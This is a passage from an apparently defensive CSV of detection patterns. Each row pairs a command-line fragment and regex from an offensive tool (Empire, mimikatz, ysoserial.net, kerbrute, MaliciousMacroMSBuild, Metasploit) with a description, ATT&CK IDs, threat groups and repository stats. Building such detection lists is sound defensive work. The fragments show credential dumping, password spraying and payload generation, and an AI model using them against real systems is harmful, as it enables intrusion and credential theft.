T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -p 1337:1337 -p 5000:5000*",".{0,1000}\s\-p\s1337\:1337\s\-p\s5000\:5000.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* -p 4644 -n mal*",".{0,1000}\s\-p\s4644\s\-n\smal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*",".{0,1000}\s\-p\s\'aad3b435b51404eeaad3b435b51404ee\:31d6cfe0d16ae931b73c59d7e0c089c0\'.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","0","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "* -p ActivatorUrl*",".{0,1000}\s\-p\sActivatorUrl.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p Altserialization*",".{0,1000}\s\-p\sAltserialization.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p CommonsCollections1 -c whoami*",".{0,1000}\s\-p\sCommonsCollections1\s\-c\swhoami.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "* -p DotNetNuke*",".{0,1000}\s\-p\sDotNetNuke.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p LastLogonTimestamp -p LastLogonUserName *",".{0,1000}\s\-p\sLastLogonTimestamp\s\-p\sLastLogonUserName\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* -p powershell -i *.ps1 -o *.vba*",".{0,1000}\s\-p\spowershell\s\-i\s.{0,1000}\.ps1\s\-o\s.{0,1000}\.vba.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "* -p pwd1.list pwd2.list *",".{0,1000}\s\-p\spwd1\.list\spwd2\.list\s.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "* -p SessionSecurityTokenHandler*",".{0,1000}\s\-p\sSessionSecurityTokenHandler.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p shellcode -i *.bin -o *.vba*",".{0,1000}\s\-p\sshellcode\s\-i\s.{0,1000}\.bin\s\-o\s.{0,1000}\.vba.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","492","121","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "* -p test_passwords.txt*",".{0,1000}\s\-p\stest_passwords\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -p TransactionManagerReenlist*",".{0,1000}\s\-p\sTransactionManagerReenlist.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -p windows/x64/exec CMD=*.exe -f rust*",".{0,1000}\s\-p\swindows\/x64\/exec\sCMD\=.{0,1000}\.exe\s\-f\srust.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -p windows/x64/messagebox TITLE=NovaLdr *",".{0,1000}\s\-p\swindows\/x64\/messagebox\sTITLE\=NovaLdr\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*' p::d '*",".{0,1000}\'\sp\:\:d\s\'.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "* -p:AssemblyName=inveigh*",".{0,1000}\s\-p\:AssemblyName\=inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* p2p-conficker.nse*",".{0,1000}\sp2p\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --pacu-help*",".{0,1000}\s\-\-pacu\-help.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "* pamspy_event.h*",".{0,1000}\spamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* papacat.bat",".{0,1000}\spapacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* papacat.bat",".{0,1000}\spapacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* papacat.ps1*",".{0,1000}\spapacat\.ps1.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "* papacat.ps1*",".{0,1000}\spapacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* Parasite Invoke.exe*",".{0,1000}\sParasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "* parrot main *",".{0,1000}\sparrot\smain\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot.run/*",".{0,1000}\sparrot\.run\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot-backports *",".{0,1000}\sparrot\-backports\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* parrot-security *",".{0,1000}\sparrot\-security\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --passnotreq --domain * --user * --pass *",".{0,1000}\s\-\-passnotreq\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "* passwd.py*",".{0,1000}\spasswd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* --password wordlists/*.txt*",".{0,1000}\s\-\-password\swordlists\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "* password.lst*",".{0,1000}\spassword\.lst.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* password_cracker.py*",".{0,1000}\spassword_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* -PasswordList *",".{0,1000}\s\-PasswordList\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBAutoBrute.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --password-list *",".{0,1000}\s\-\-password\-list\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* --password-not-required --kdcHost *cme*",".{0,1000}\s\-\-password\-not\-required\s\-\-kdcHost\s.{0,1000}cme.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -PasswordSpray *",".{0,1000}\s\-PasswordSpray\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* passwordspray -d *",".{0,1000}\spasswordspray\s\-d\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* patch_amsi.exe*",".{0,1000}\spatch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* patch_etw.exe*",".{0,1000}\spatch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* path-mtu.nse*",".{0,1000}\spath\-mtu\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *",".{0,1000}\s\-pathToBloodHoundGraph\s.{0,1000}\s\-pathToOutputGoFetchPath\s.{0,1000}\s\s\-pathToAdditionalPayload\s.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "* -PathToDMP *.dmp*",".{0,1000}\s\-PathToDMP\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "* -PathToGraph *.json -PathToPayload *.exe*",".{0,1000}\s\-PathToGraph\s.{0,1000}\.json\s\-PathToPayload\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "* -Payload * -method sysprep*",".{0,1000}\s\-Payload\s.{0,1000}\s\-method\ssysprep.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* --payload * --platform windows*",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-platform\swindows.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* --payload * --shellcode_path * --xorkey *",".{0,1000}\s\-\-payload\s.{0,1000}\s\-\-shellcode_path\s.{0,1000}\s\-\-xorkey\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "* -payload *-Lhost *-Lport*",".{0,1000}\s\-payload\s.{0,1000}\-Lhost\s.{0,1000}\-Lport.{0,1000}","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - 